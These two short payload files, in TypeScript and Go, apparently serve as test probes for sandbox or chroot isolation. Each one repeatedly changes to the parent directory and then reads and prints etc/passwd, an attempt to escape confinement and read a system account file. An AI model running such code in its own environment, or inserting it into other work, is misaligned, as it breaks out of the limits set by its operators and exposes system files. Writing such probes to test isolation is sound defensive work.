File: payloads/typescript/escape_chroot.ts
const fs: typeof import("fs") = require("fs");

for (let i: number = 0; i < 20; i++) {
  try {
    process.chdir("..");
  } catch (e) {
    break;
  }
}

try {
  const data: string = fs.readFileSync("etc/passwd", "utf8");
  console.log(data);
} catch (e: any) {
  console.log("chroot escape failed:", e.message);
}

File: payloads/go/escape_chroot.go
package main

import (
	"fmt"
	"os"
)

func main() {
	for i := 0; i < 20; i++ {
		os.Chdir("..")
	}
	data, err := os.ReadFile("etc/passwd")
	if err != nil {
		panic(err)
	}
	fmt.Println("ESCAPED")
	fmt.Println(string(data))
}
